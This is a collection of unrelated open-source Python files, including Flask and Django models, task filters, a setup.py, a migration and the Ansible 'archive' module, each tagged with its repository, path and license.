self.output.write("#Griffin\n")
if self.wxobj:
members = sorted([attr for attr in dir(self) if not callable(getattr(self,attr)) and not attr.startswith("__")])
memberstr = ""
for m in members:
memberstr += "%s = %s, " % (m, getattr(self, m))
self.output.write("#GUI with: ctrldata=%s, annotation=%s, output=%s\n" % (",".join(self.ctrldata).encode('utf-8'), self.annotation_path.encode('utf-8'), self.output.name.encode('utf-8')))
else:
self.output.write("#Console: python3 %s\n" % " ".join(sys.argv))
self.output.write("#Data: %s\n" % (",".join(self.ctrldata).encode('utf-8')))
self.output.write("#Annotation path: %s\n" % self.annotation_path.encode('utf-8'))
self.output.write("#Time: %s\n" % (time.time() - start_time))
self.output.write("#%s\n" % "\t".join(columns))
for (gene, exprun, pval, padj) in results:
self.output.write("%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%1.1f\t%1.5f\t%1.5f\n" % (gene.orf, gene.name, gene.desc, gene.k, gene.n, gene.r, gene.s, gene.t, exprun, pval, padj))
self.output.close()
self.transit_message("") # Printing empty line to flush stdout
self.transit_message("Adding File: %s" % (self.output.name))
self.add_file(filetype="Griffin")
self.finish()
self.transit_message("Finished Griffin Method")
    @classmethod
    def usage_string(self):
        # NOTE(review): declared as a @classmethod, so 'self' actually receives
        # the class object; the conventional parameter name would be 'cls'.
        # Returns the console usage/help text for the griffin subcommand.
        return """python3 %s griffin <comma-separated .wig files> <annotation .prot_table> <output file> [Optional Arguments]
Optional Arguments:
-m <integer> := Smallest read-count to consider. Default: -m 1
-r <string> := How to handle replicates. Sum or Mean. Default: -r Sum
-sC := Include stop-codon (default is to ignore).
-iN <float> := Ignore TAs occuring at given fraction (as integer) of the N terminus. Default: -iN 0
-iC <float> := Ignore TAs occuring at given fraction (as integer) of the C terminus. Default: -iC 0
""" % (sys.argv[0])
if __name__ == "__main__":
    # Parse the raw command line into positional args and keyword flags.
    # NOTE(review): the (args, kwargs) result is never used below —
    # fromargs() re-parses sys.argv[1:] itself; confirm cleanargs() has no
    # required side effects before removing this call.
    (args, kwargs) = transit_tools.cleanargs(sys.argv)
    # Build the analysis object from the command-line arguments and run it.
    G = GriffinMethod.fromargs(sys.argv[1:])
    G.console_message("Printing the member variables:")
    G.print_members()
    print("")
    print("Running:")
    G.Run()
| mad-lab/transit | src/pytransit/analysis/griffin.py | Python | gpl-3.0 | 10,076 |
from demobrowser import db
from datetime import datetime
import re
from sqlalchemy import or_, and_
import math
class Demo(db.Model):
    """Database record for a recorded game demo file.

    Tracks the on-disk demo (path/size) plus display metadata such as
    title, map name and recording date.
    """

    id = db.Column(db.Integer, primary_key=True)
    logfile = db.Column(db.String(10))
    # Human-readable size string, e.g. "27.45 MB".
    size = db.Column(db.String(12))
    # Demo filename on disk; used as the lookup key by demo_exists()/create().
    path = db.Column(db.String(512))
    # Map name parsed from the filename.
    name = db.Column(db.String(80))
    sub = db.Column(db.String(160))
    date = db.Column(db.Date())
    private = db.Column(db.Boolean())
    nuked = db.Column(db.Boolean())
    summary = db.Column(db.Text())
    title = db.Column(db.String(80))

    @staticmethod
    def get_all():
        """Return every demo in the database."""
        return Demo.query.all()

    @staticmethod
    def get_page(page, per_page=12):
        """Return one page of demos, newest first."""
        return Demo.query.order_by(Demo.date.desc(), Demo.id.desc()).paginate(page, per_page=per_page)

    def get_page_of(self, per_page=12):
        """Return the 1-based page number this demo appears on in get_page()."""
        # Get the number of items NEWER than this one
        sweet_query = Demo.query.order_by(Demo.date.asc(),
                                          Demo.id.asc()).filter(or_(Demo.date > self.date,
                                                                    and_(Demo.date >= self.date,
                                                                         Demo.id > self.id)))
        # Now, calculate the page that this guy is on!
        return int(math.ceil((sweet_query.count() + 1) / float(per_page)))

    def good_date(self):
        """Return the demo date formatted for display, e.g. "15 May 2017"."""
        # Maybe I like "%B %d, %Y" better...
        return self.date.strftime("%d %B %Y")

    def previous_by_date(self):
        """Return the next-older demo (by date, then id), or None."""
        sweet_query = Demo.query.order_by(Demo.date.desc(),
                                          Demo.id.desc()).filter(or_(Demo.date < self.date,
                                                                     and_(Demo.date <= self.date,
                                                                          Demo.id < self.id)))
        return sweet_query.first()

    def next_by_date(self):
        """Return the next-newer demo (by date, then id), or None."""
        sweet_query = Demo.query.order_by(Demo.date.asc(),
                                          Demo.id.asc()).filter(or_(Demo.date > self.date,
                                                                    and_(Demo.date >= self.date,
                                                                         Demo.id > self.id)))
        return sweet_query.first()

    @staticmethod
    def demo_exists(demo_name):
        """Return True if a demo with this path/filename is already stored."""
        return (Demo.query.filter_by(path=demo_name).first() is not None)

    @staticmethod
    def check_demo_filename(demo_name):
        """Parse an auto-recorded demo filename.

        Returns a dict with 'date' (datetime) and 'map' keys on success,
        or False when the name does not match the expected pattern.
        """
        # Raw string so '\.' stays a literal regex escape (avoids the
        # invalid-escape-sequence warning on newer Python versions).
        match = re.match(r'auto-(?P<date>[0-9]{8})-.*-(?P<map>.*)\.dem', demo_name)
        result = False
        if match:
            match_dict = match.groupdict()
            str_date = match_dict['date']
            match_dict['date'] = datetime(int(str_date[0:4]), int(str_date[4:6]), int(str_date[6:8]))
            result = match_dict
        return result

    @staticmethod
    def create_from_name(demo_name):
        """Create a Demo from an auto-recorded filename; returns (ok, message)."""
        demo = Demo.check_demo_filename(demo_name)
        if demo:
            # NOTE(review): size is hard-coded here — presumably a placeholder;
            # confirm callers supply the real file size where it matters.
            return Demo.create(demo['map'], demo_name, "27.45 MB", demo['date'])
        return (False, "Whoops, something went wrong... :( %s" % demo_name)

    @staticmethod
    def create(map_name, demopath, demo_size, map_date, tflog=None):
        """Insert a new demo row; returns (ok, message).

        The row is only added to the session; the caller commits.
        """
        # Make sure the user isn't already registered.
        demo = Demo.query.filter_by(path=demopath).first()
        if demo:
            return (False, "Error, demo already exists!")
        new_demo = Demo()
        new_demo.size = demo_size
        new_demo.path = demopath
        new_demo.name = map_name
        new_demo.date = map_date
        # Init the title to the map_name
        new_demo.title = map_name
        db.session.add(new_demo)
        return (True, "Success! Demo '%s' was uploaded!" % demopath)

    @staticmethod
    def get_from_id(id):
        """Return the demo with this primary key, or None."""
        return Demo.query.filter_by(id=id).first()

    @staticmethod
    def get_from_filename(name):
        """Return the demo with this path/filename, or None."""
        return Demo.query.filter_by(path=name).first()

    @staticmethod
    def delete(id):
        """Delete and commit the demo with this id; False if not found."""
        demo = Demo.query.filter_by(id=id).first()
        if not demo:
            return False
        db.session.delete(demo)
        db.session.commit()
        return True

    def get_map_name(self):
        """Split the stored map name into (pretty_name, PREFIX).

        e.g. "cp_badlands" -> ("Badlands", "CP"); a name without an
        underscore yields an empty prefix.
        """
        pieces = self.name.upper().split("_")
        if len(pieces) > 1:
            prefix = pieces.pop(0)
        else:
            prefix = ""
        map_name = " ".join([str(piece).capitalize() for piece in pieces])
        return map_name, prefix

    def __repr__(self):
        return "<(Demo:%s - Title: %s, Date: %s, Map: %s)>" % (self.id, self.title, self.date, self.name)
class User(db.Model):
    """A site user authenticated via Steam OpenID."""

    id = db.Column(db.Integer, primary_key=True)
    steam_id = db.Column(db.String(40))
    # this is so we know whos steam id is whos
    name = db.Column(db.String(40))
    # BUGFIX: was `nickname = db.String(80)`, which assigned a bare SQLAlchemy
    # type object instead of declaring a column, so nicknames were never
    # persisted. Wrapped in db.Column() to create a real column.
    nickname = db.Column(db.String(80))
    admin = db.Column(db.Boolean)

    def __repr__(self):
        return "<User name='%s' nick='%s' admin='%s' steam='%s'>" % (self.name, self.nickname, self.admin, self.steam_id)

    def make_admin(self, admin):
        """Set (or clear) this user's admin flag and commit immediately."""
        self.admin = admin
        db.session.commit()

    @staticmethod
    def get(steam_id):
        """Return the user for this steam id, or False if unknown.

        The very first login ever creates (and returns) an initial admin user.
        """
        # Always create the first user that logs in.
        if not User.query.count():
            user = User()
            user.steam_id = steam_id
            user.name = 'FernFerret'
            user.admin = True
            db.session.add(user)
            # Parenthesized so this line is also valid Python 3; output on
            # Python 2 is unchanged (single-argument print).
            print("Creating initial user - %s" % steam_id)
            return user
        user = User.query.filter_by(steam_id=steam_id).first()
        if not user:
            return False
        return user

    @staticmethod
    def get_from_id(id):
        """Return the user with this primary key, or None."""
        return User.query.filter_by(id=id).first()

    @staticmethod
    def get_all():
        """Return every user."""
        return User.query.all()

    @staticmethod
    def get_test_user():
        """Return an arbitrary user (the first row); handy for testing."""
        return User.query.first()

    @staticmethod
    def create(name, steamid, admin):
        """Insert a new user; returns (ok, message). The caller commits."""
        # Make sure the user isn't already registered.
        user = User.query.filter_by(steam_id=steamid).first()
        if user:
            return (False, "Error, user already exists!")
        new_user = User()
        new_user.steam_id = steamid
        new_user.name = name
        new_user.admin = admin
        db.session.add(new_user)
        return (True, "Success! User '%s' was created!" % name)

    @staticmethod
    def delete(id):
        """Delete and commit the user with this id; False if not found."""
        user = User.query.filter_by(id=id).first()
        if not user:
            return False
        db.session.delete(user)
        db.session.commit()
        return True
| FernFerret/demobrowser | demobrowser/models.py | Python | mit | 6,463 |
#!/usr/bin/python
import os
from setuptools import setup, find_packages

# Directory containing this setup.py; used to read README/CHANGES.
here = os.path.abspath(os.path.dirname(__file__))

setup(
    name='django-sizefield',
    version='0.10.ceda',
    author='Mathieu Leplatre',
    author_email='contact@mathieu-leplatre.info',
    url='https://github.com/leplatrem/django-sizefield',
    download_url="http://pypi.python.org/pypi/django-sizefield/",
    description="A model field to store a file size, whose edition and display shows units.",
    long_description=open(os.path.join(here, 'README.rst')).read() + '\n\n' +
                     open(os.path.join(here, 'CHANGES')).read(),
    # Fixed typo: 'LPGL' -> 'LGPL' (the package is LGPL-licensed; see LICENSE).
    license='LGPL, see LICENSE file.',
    install_requires=[
        'Django',
    ],
    packages=find_packages(),
    include_package_data=True,
    zip_safe=False,
    classifiers=['Topic :: Utilities',
                 'Natural Language :: English',
                 'Operating System :: OS Independent',
                 'Intended Audience :: Developers',
                 'Environment :: Web Environment',
                 'Framework :: Django',
                 'Development Status :: 5 - Production/Stable',
                 'Programming Language :: Python :: 2.7'],
)
| cedadev/django-sizefield | setup.py | Python | lgpl-3.0 | 1,205 |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-05-15 16:42
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: redefine ``SocialAccount.email`` as CharField(max_length=256)."""

    dependencies = [
        ('sonetworks', '0033_auto_20170514_2158'),
    ]

    operations = [
        migrations.AlterField(
            model_name='socialaccount',
            name='email',
            field=models.CharField(max_length=256),
        ),
    ]
| semitki/semitki | api/sonetworks/migrations/0034_auto_20170515_1642.py | Python | mit | 461 |
# Package version as a tuple of integers; bump here on release.
version = (0, 0, 1)
# Human-readable dotted form derived from the tuple, e.g. "0.0.1".
version_str = ".".join(map(str, version))
| veltzer/demos-python | config/version.py | Python | gpl-3.0 | 68 |
from django import forms
import django_filters as filters
from tasks.models import Task
from projects.models import Project
from django.contrib.auth.models import User
from milestones.models import Milestone
from django.contrib.contenttypes.models import ContentType
from django.utils.safestring import SafeString
class TaskFilter(filters.FilterSet):
    """Simple task filter exposing only the workflow state."""

    # Multiple states can be selected at once via checkboxes.
    state = filters.MultipleChoiceFilter(
        choices=Task.STATE_CHOICES,
        widget=forms.CheckboxSelectMultiple,
    )

    class Meta:
        model = Task
        fields = ["state"]
class TaskMilestoneFilter(filters.FilterSet):
    """Filter tasks by state and by milestone within a single project."""

    state = filters.MultipleChoiceFilter(
        choices = Task.STATE_CHOICES,
        widget = forms.CheckboxSelectMultiple,
    )

    def __init__(self, project, data=None, queryset=None, prefix=None):
        # Build the milestone choices at instantiation time, limited to the
        # milestones attached (via generic foreign key) to the given project.
        super(TaskMilestoneFilter, self).__init__(data, queryset, prefix)
        content_type = ContentType.objects.get_for_model(Project)
        # NOTE(review): the first positional argument is the filter's field
        # name in older django-filter versions — confirm against the
        # installed version before upgrading.
        self.filters['milestone'] = filters.MultipleChoiceFilter('milestone',
            choices = tuple([(m.id, m.title) for m in
                             Milestone.objects.filter(content_type=content_type,
                                                      object_id=project.id)]),
            #widget = forms.CheckboxSelectMultiple,
            widget = forms.SelectMultiple,
        )

    class Meta:
        model = Task
        fields = ["state", "milestone"]
class TaskProjectFilter(filters.FilterSet):
    """Filter tasks across all projects by state, milestone, project and assignee."""

    state = filters.MultipleChoiceFilter(
        choices = Task.STATE_CHOICES,
        widget = forms.CheckboxSelectMultiple,
    )

    # NOTE(review): this block runs at class-definition (import) time, so the
    # milestone choices are queried from the database once per process and can
    # go stale; confirm this is acceptable before reusing this FilterSet.
    milestones = []
    projects = Project.objects.all()
    for project in projects:
        project_milestones = Milestone.objects.filter(object_id=project.id)
        if len(project_milestones) >0:
            # Project name acts as a non-selectable group header ('' value),
            # followed by its milestones indented with &nbsp; entities.
            milestones.append(('', project.name))
            for milestone in project_milestones:
                milestones.append((milestone.id, SafeString('&nbsp;&nbsp;' +
                    milestone.title)))
    milestone = filters.MultipleChoiceFilter(
        name = 'milestone',
        choices = tuple(milestones),
        widget = forms.SelectMultiple,
    )

    def __init__(self, user, data=None, queryset=None, prefix=None):
        # Build per-request project and assignee choices, putting the
        # requesting user's own projects (and self-assignment) first.
        super(TaskProjectFilter, self).__init__(data, queryset, prefix)
        projects = []
        assignee = []
        # NOTE(review): is_authenticated is called as a method here; on
        # Django >= 1.10 it is a property, so this would need the
        # parentheses dropped.
        if user.is_authenticated():
            assignee.append((user.id, 'Assigned to You'))
            for u in User.objects.exclude(id=user.id):
                assignee.append((u.id, str(u)))
            my_projects = Project.objects.filter(member_users=user).order_by("name")
            projects.append(('','Your Projects'))
            for project in my_projects:
                projects.append((project.id,
                    SafeString('&nbsp;&nbsp;' + project.name)))
            projects.append(('','Other Projects'))
            for project in Project.objects.exclude(id__in=my_projects):
                projects.append((project.id,
                    SafeString('&nbsp;&nbsp;' + project.name)))
        else:
            # Anonymous users see every project and every possible assignee.
            projects.append(('','All Projects'))
            for project in Project.objects.all():
                projects.append((project.id,
                    SafeString('&nbsp;&nbsp;' + project.name)))
            for u in User.objects.all():
                assignee.append((u.id, str(u)))
        object_id = filters.MultipleChoiceFilter(
            # choices = tuple([(p.id, p.name) for p in Project.objects.all()]),
            name='object_id',
            choices = tuple(projects),
            widget = forms.SelectMultiple,
            label='Project'
        )
        self.filters['object_id'] = object_id
        assignee = filters.MultipleChoiceFilter(
            # choices = tuple([(p.id, p.name) for p in Project.objects.all()]),
            name='assignee',
            choices = tuple(assignee),
            widget = forms.SelectMultiple,
            label='Assignee'
        )
        self.filters['assignee'] = assignee

    class Meta:
        model = Task
        fields = ["state", "milestone", "object_id", "assignee"]
| hbussell/pinax-tracker | apps/tasks/filters.py | Python | mit | 4,235 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2016, Ben Doherty <bendohmv@gmail.com>
# Sponsored by Oomph, Inc. http://www.oomphinc.com
# Copyright: (c) 2017, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: archive
version_added: '2.3'
short_description: Creates a compressed archive of one or more files or trees
extends_documentation_fragment: files
description:
- Packs an archive.
- It is the opposite of M(unarchive).
- By default, it assumes the compression source exists on the target.
- It will not copy the source file from the local system to the target before archiving.
- Source files can be deleted after archival by specifying I(remove=True).
options:
path:
description:
- Remote absolute path, glob, or list of paths or globs for the file or files to compress or archive.
type: list
required: true
format:
description:
- The type of compression to use.
- Support for xz was added in Ansible 2.5.
type: str
choices: [ bz2, gz, tar, xz, zip ]
default: gz
dest:
description:
- The file name of the destination archive.
- This is required when C(path) refers to multiple files by either specifying a glob, a directory or multiple paths in a list.
type: path
exclude_path:
description:
- Remote absolute path, glob, or list of paths or globs for the file or files to exclude from the archive.
type: list
version_added: '2.4'
force_archive:
version_added: '2.8'
description:
- Allow you to force the module to treat this as an archive even if only a single file is specified.
- By default behaviour is maintained. i.e A when a single file is specified it is compressed only (not archived).
type: bool
default: false
remove:
description:
- Remove any added source files and trees after adding to archive.
type: bool
default: no
notes:
- Requires tarfile, zipfile, gzip and bzip2 packages on target host.
- Requires lzma or backports.lzma if using xz format.
- Can produce I(gzip), I(bzip2), I(lzma) and I(zip) compressed files or archives.
seealso:
- module: unarchive
author:
- Ben Doherty (@bendoh)
'''
EXAMPLES = r'''
- name: Compress directory /path/to/foo/ into /path/to/foo.tgz
archive:
path: /path/to/foo
dest: /path/to/foo.tgz
- name: Compress regular file /path/to/foo into /path/to/foo.gz and remove it
archive:
path: /path/to/foo
remove: yes
- name: Create a zip archive of /path/to/foo
archive:
path: /path/to/foo
format: zip
- name: Create a bz2 archive of multiple files, rooted at /path
archive:
path:
- /path/to/foo
- /path/wong/foo
dest: /path/file.tar.bz2
format: bz2
- name: Create a bz2 archive of a globbed path, while excluding specific dirnames
archive:
path:
- /path/to/foo/*
dest: /path/file.tar.bz2
exclude_path:
- /path/to/foo/bar
- /path/to/foo/baz
format: bz2
- name: Create a bz2 archive of a globbed path, while excluding a glob of dirnames
archive:
path:
- /path/to/foo/*
dest: /path/file.tar.bz2
exclude_path:
- /path/to/foo/ba*
format: bz2
- name: Use gzip to compress a single archive (i.e don't archive it first with tar)
archive:
path: /path/to/foo/single.file
dest: /path/file.gz
format: gz
- name: Create a tar.gz archive of a single file.
archive:
path: /path/to/foo/single.file
dest: /path/file.tar.gz
format: gz
force_archive: true
'''
RETURN = r'''
state:
description:
The current state of the archived file.
If 'absent', then no source files were found and the archive does not exist.
If 'compress', then the file source file is in the compressed state.
If 'archive', then the source file or paths are currently archived.
If 'incomplete', then an archive was created, but not all source paths were found.
type: str
returned: always
missing:
description: Any files that were missing from the source.
type: list
returned: success
archived:
description: Any files that were compressed or added to the archive.
type: list
returned: success
arcroot:
description: The archive root.
type: str
returned: always
expanded_paths:
description: The list of matching paths from paths argument.
type: list
returned: always
expanded_exclude_paths:
description: The list of matching exclude paths from the exclude_path argument.
type: list
returned: always
'''
import bz2
import filecmp
import glob
import gzip
import io
import os
import re
import shutil
import tarfile
import zipfile
from traceback import format_exc
from ansible.module_utils.basic import AnsibleModule, missing_required_lib
from ansible.module_utils._text import to_bytes, to_native
from ansible.module_utils.six import PY3
LZMA_IMP_ERR = None
if PY3:
try:
import lzma
HAS_LZMA = True
except ImportError:
LZMA_IMP_ERR = format_exc()
HAS_LZMA = False
else:
try:
from backports import lzma
HAS_LZMA = True
except ImportError:
LZMA_IMP_ERR = format_exc()
HAS_LZMA = False
def main():
    """Entry point for the archive module.

    Expands the requested source and exclude paths, decides whether to build
    a multi-file archive or compress a single file, writes the result in the
    requested format, optionally removes the sources, and exits via
    module.exit_json()/fail_json().
    """
    module = AnsibleModule(
        argument_spec=dict(
            path=dict(type='list', required=True),
            format=dict(type='str', default='gz', choices=['bz2', 'gz', 'tar', 'xz', 'zip']),
            dest=dict(type='path'),
            exclude_path=dict(type='list'),
            force_archive=dict(type='bool', default=False),
            remove=dict(type='bool', default=False),
        ),
        add_file_common_args=True,
        supports_check_mode=True,
    )

    params = module.params
    check_mode = module.check_mode
    paths = params['path']
    dest = params['dest']
    b_dest = None if not dest else to_bytes(dest, errors='surrogate_or_strict')
    exclude_paths = params['exclude_path']
    remove = params['remove']

    b_expanded_paths = []
    b_expanded_exclude_paths = []
    fmt = params['format']
    b_fmt = to_bytes(fmt, errors='surrogate_or_strict')
    force_archive = params['force_archive']
    globby = False
    changed = False
    state = 'absent'

    # Simple or archive file compression (inapplicable with 'zip' since it's always an archive)
    archive = False
    b_successes = []

    # Fail early
    if not HAS_LZMA and fmt == 'xz':
        # BUGFIX: a second, unreachable module.fail_json() call that followed
        # this one was removed — fail_json() never returns.
        module.fail_json(msg=missing_required_lib("lzma or backports.lzma", reason="when using xz format"),
                         exception=LZMA_IMP_ERR)

    for path in paths:
        b_path = os.path.expanduser(
            os.path.expandvars(
                to_bytes(path, errors='surrogate_or_strict')
            )
        )

        # Expand any glob characters. If found, add the expanded glob to the
        # list of expanded_paths, which might be empty.
        if (b'*' in b_path or b'?' in b_path):
            b_expanded_paths.extend(glob.glob(b_path))
            globby = True

        # If there are no glob characters the path is added to the expanded paths
        # whether the path exists or not
        else:
            b_expanded_paths.append(b_path)

    # Only attempt to expand the exclude paths if it exists
    if exclude_paths:
        for exclude_path in exclude_paths:
            b_exclude_path = os.path.expanduser(
                os.path.expandvars(
                    to_bytes(exclude_path, errors='surrogate_or_strict')
                )
            )

            # Expand any glob characters. If found, add the expanded glob to the
            # list of expanded_paths, which might be empty.
            if (b'*' in b_exclude_path or b'?' in b_exclude_path):
                b_expanded_exclude_paths.extend(glob.glob(b_exclude_path))

            # If there are no glob character the exclude path is added to the expanded
            # exclude paths whether the path exists or not.
            else:
                b_expanded_exclude_paths.append(b_exclude_path)

    if not b_expanded_paths:
        return module.fail_json(
            path=', '.join(paths),
            expanded_paths=to_native(b', '.join(b_expanded_paths), errors='surrogate_or_strict'),
            msg='Error, no source paths were found'
        )

    # Only try to determine if we are working with an archive or not if we haven't set archive to true
    if not force_archive:
        # If we actually matched multiple files or TRIED to, then
        # treat this as a multi-file archive
        archive = globby or os.path.isdir(b_expanded_paths[0]) or len(b_expanded_paths) > 1
    else:
        archive = True

    # Default created file name (for single-file archives) to
    # <file>.<format>
    if not b_dest and not archive:
        b_dest = b'%s.%s' % (b_expanded_paths[0], b_fmt)

    # Force archives to specify 'dest'
    if archive and not b_dest:
        module.fail_json(dest=dest, path=', '.join(paths), msg='Error, must specify "dest" when archiving multiple files or trees')

    b_sep = to_bytes(os.sep, errors='surrogate_or_strict')

    b_archive_paths = []
    b_missing = []
    b_arcroot = b''

    for b_path in b_expanded_paths:
        # Use the longest common directory name among all the files
        # as the archive root path
        if b_arcroot == b'':
            b_arcroot = os.path.dirname(b_path) + b_sep
        else:
            for i in range(len(b_arcroot)):
                if b_path[i] != b_arcroot[i]:
                    break

            if i < len(b_arcroot):
                b_arcroot = os.path.dirname(b_arcroot[0:i + 1])

            b_arcroot += b_sep

        # Don't allow archives to be created anywhere within paths to be removed
        if remove and os.path.isdir(b_path):
            b_path_dir = b_path
            if not b_path.endswith(b'/'):
                b_path_dir += b'/'

            if b_dest.startswith(b_path_dir):
                module.fail_json(
                    path=', '.join(paths),
                    msg='Error, created archive can not be contained in source paths when remove=True'
                )

        if os.path.lexists(b_path) and b_path not in b_expanded_exclude_paths:
            b_archive_paths.append(b_path)
        else:
            b_missing.append(b_path)

    # No source files were found but the named archive exists: are we 'compress' or 'archive' now?
    if len(b_missing) == len(b_expanded_paths) and b_dest and os.path.exists(b_dest):
        # Just check the filename to know if it's an archive or simple compressed file
        if re.search(br'(\.tar|\.tar\.gz|\.tgz|\.tbz2|\.tar\.bz2|\.tar\.xz|\.zip)$', os.path.basename(b_dest), re.IGNORECASE):
            state = 'archive'
        else:
            state = 'compress'

    # Multiple files, or globbiness
    elif archive:
        if not b_archive_paths:
            # No source files were found, but the archive is there.
            if os.path.lexists(b_dest):
                state = 'archive'
        elif b_missing:
            # SOME source files were found, but not all of them
            state = 'incomplete'

        archive = None
        size = 0
        errors = []

        if os.path.lexists(b_dest):
            size = os.path.getsize(b_dest)

        if state != 'archive':
            if check_mode:
                changed = True

            else:
                try:
                    # Slightly more difficult (and less efficient!) compression using zipfile module
                    if fmt == 'zip':
                        arcfile = zipfile.ZipFile(
                            to_native(b_dest, errors='surrogate_or_strict', encoding='ascii'),
                            'w',
                            zipfile.ZIP_DEFLATED,
                            True
                        )

                    # Easier compression using tarfile module
                    elif fmt == 'gz' or fmt == 'bz2':
                        arcfile = tarfile.open(to_native(b_dest, errors='surrogate_or_strict', encoding='ascii'), 'w|' + fmt)

                    # python3 tarfile module allows xz format but for python2 we have to create the tarfile
                    # in memory and then compress it with lzma.
                    elif fmt == 'xz':
                        arcfileIO = io.BytesIO()
                        arcfile = tarfile.open(fileobj=arcfileIO, mode='w')

                    # Or plain tar archiving
                    elif fmt == 'tar':
                        arcfile = tarfile.open(to_native(b_dest, errors='surrogate_or_strict', encoding='ascii'), 'w')

                    b_match_root = re.compile(br'^%s' % re.escape(b_arcroot))
                    for b_path in b_archive_paths:
                        if os.path.isdir(b_path):
                            # Recurse into directories
                            for b_dirpath, b_dirnames, b_filenames in os.walk(b_path, topdown=True):
                                if not b_dirpath.endswith(b_sep):
                                    b_dirpath += b_sep

                                for b_dirname in b_dirnames:
                                    b_fullpath = b_dirpath + b_dirname
                                    n_fullpath = to_native(b_fullpath, errors='surrogate_or_strict', encoding='ascii')
                                    n_arcname = to_native(b_match_root.sub(b'', b_fullpath), errors='surrogate_or_strict')

                                    try:
                                        if fmt == 'zip':
                                            arcfile.write(n_fullpath, n_arcname)
                                        else:
                                            arcfile.add(n_fullpath, n_arcname, recursive=False)

                                    except Exception as e:
                                        errors.append('%s: %s' % (n_fullpath, to_native(e)))

                                for b_filename in b_filenames:
                                    b_fullpath = b_dirpath + b_filename
                                    n_fullpath = to_native(b_fullpath, errors='surrogate_or_strict', encoding='ascii')
                                    n_arcname = to_native(b_match_root.sub(b'', b_fullpath), errors='surrogate_or_strict')

                                    try:
                                        if fmt == 'zip':
                                            arcfile.write(n_fullpath, n_arcname)
                                        else:
                                            arcfile.add(n_fullpath, n_arcname, recursive=False)

                                        b_successes.append(b_fullpath)
                                    except Exception as e:
                                        errors.append('Adding %s: %s' % (to_native(b_path), to_native(e)))
                        else:
                            path = to_native(b_path, errors='surrogate_or_strict', encoding='ascii')
                            arcname = to_native(b_match_root.sub(b'', b_path), errors='surrogate_or_strict')
                            if fmt == 'zip':
                                arcfile.write(path, arcname)
                            else:
                                arcfile.add(path, arcname, recursive=False)

                            b_successes.append(b_path)
                except Exception as e:
                    expanded_fmt = 'zip' if fmt == 'zip' else ('tar.' + fmt)
                    module.fail_json(
                        msg='Error when writing %s archive at %s: %s' % (expanded_fmt, dest, to_native(e)),
                        exception=format_exc()
                    )

                if arcfile:
                    arcfile.close()
                    state = 'archive'

                if fmt == 'xz':
                    with lzma.open(b_dest, 'wb') as f:
                        f.write(arcfileIO.getvalue())
                    arcfileIO.close()

                if errors:
                    module.fail_json(msg='Errors when writing archive at %s: %s' % (dest, '; '.join(errors)))

        if state in ['archive', 'incomplete'] and remove:
            for b_path in b_successes:
                try:
                    if os.path.isdir(b_path):
                        shutil.rmtree(b_path)
                    elif not check_mode:
                        os.remove(b_path)
                except OSError as e:
                    errors.append(to_native(b_path))

            if errors:
                module.fail_json(dest=dest, msg='Error deleting some source files: ', files=errors)

        # Rudimentary check: If size changed then file changed. Not perfect, but easy.
        if not check_mode and os.path.getsize(b_dest) != size:
            changed = True

        if b_successes and state != 'incomplete':
            state = 'archive'

    # Simple, single-file compression
    else:
        b_path = b_expanded_paths[0]

        # No source or compressed file
        if not (os.path.exists(b_path) or os.path.lexists(b_dest)):
            state = 'absent'

        # if it already exists and the source file isn't there, consider this done
        elif not os.path.lexists(b_path) and os.path.lexists(b_dest):
            state = 'compress'

        else:
            if module.check_mode:
                if not os.path.exists(b_dest):
                    changed = True
            else:
                size = 0
                f_in = f_out = arcfile = None

                if os.path.lexists(b_dest):
                    size = os.path.getsize(b_dest)

                try:
                    if fmt == 'zip':
                        arcfile = zipfile.ZipFile(
                            to_native(b_dest, errors='surrogate_or_strict', encoding='ascii'),
                            'w',
                            zipfile.ZIP_DEFLATED,
                            True
                        )
                        arcfile.write(
                            to_native(b_path, errors='surrogate_or_strict', encoding='ascii'),
                            to_native(b_path[len(b_arcroot):], errors='surrogate_or_strict')
                        )
                        arcfile.close()
                        state = 'archive'  # because all zip files are archives
                    elif fmt == 'tar':
                        arcfile = tarfile.open(to_native(b_dest, errors='surrogate_or_strict', encoding='ascii'), 'w')
                        arcfile.add(to_native(b_path, errors='surrogate_or_strict', encoding='ascii'))
                        arcfile.close()
                    else:
                        f_in = open(b_path, 'rb')

                        n_dest = to_native(b_dest, errors='surrogate_or_strict', encoding='ascii')
                        if fmt == 'gz':
                            f_out = gzip.open(n_dest, 'wb')
                        elif fmt == 'bz2':
                            f_out = bz2.BZ2File(n_dest, 'wb')
                        elif fmt == 'xz':
                            f_out = lzma.LZMAFile(n_dest, 'wb')
                        else:
                            raise OSError("Invalid format")

                        shutil.copyfileobj(f_in, f_out)

                    b_successes.append(b_path)
                except OSError as e:
                    module.fail_json(
                        path=to_native(b_path),
                        dest=dest,
                        msg='Unable to write to compressed file: %s' % to_native(e), exception=format_exc()
                    )

                if arcfile:
                    arcfile.close()
                if f_in:
                    f_in.close()
                if f_out:
                    f_out.close()

                # Rudimentary check: If size changed then file changed. Not perfect, but easy.
                if os.path.getsize(b_dest) != size:
                    changed = True

            state = 'compress'

            if remove and not check_mode:
                try:
                    os.remove(b_path)
                except OSError as e:
                    module.fail_json(
                        path=to_native(b_path),
                        msg='Unable to remove source file: %s' % to_native(e), exception=format_exc()
                    )

    params['path'] = b_dest
    file_args = module.load_file_common_arguments(params)

    if not check_mode:
        changed = module.set_fs_attributes_if_different(file_args, changed)

    module.exit_json(
        archived=[to_native(p, errors='surrogate_or_strict') for p in b_successes],
        dest=dest,
        changed=changed,
        state=state,
        arcroot=to_native(b_arcroot, errors='surrogate_or_strict'),
        missing=[to_native(p, errors='surrogate_or_strict') for p in b_missing],
        expanded_paths=[to_native(p, errors='surrogate_or_strict') for p in b_expanded_paths],
        expanded_exclude_paths=[to_native(p, errors='surrogate_or_strict') for p in b_expanded_exclude_paths],
    )


if __name__ == '__main__':
    main()
| 2ndQuadrant/ansible | lib/ansible/modules/files/archive.py | Python | gpl-3.0 | 21,483 |
'''
STK-Unit Command line tool
Copyright (C) 2013 Giacomo Picchiarelli
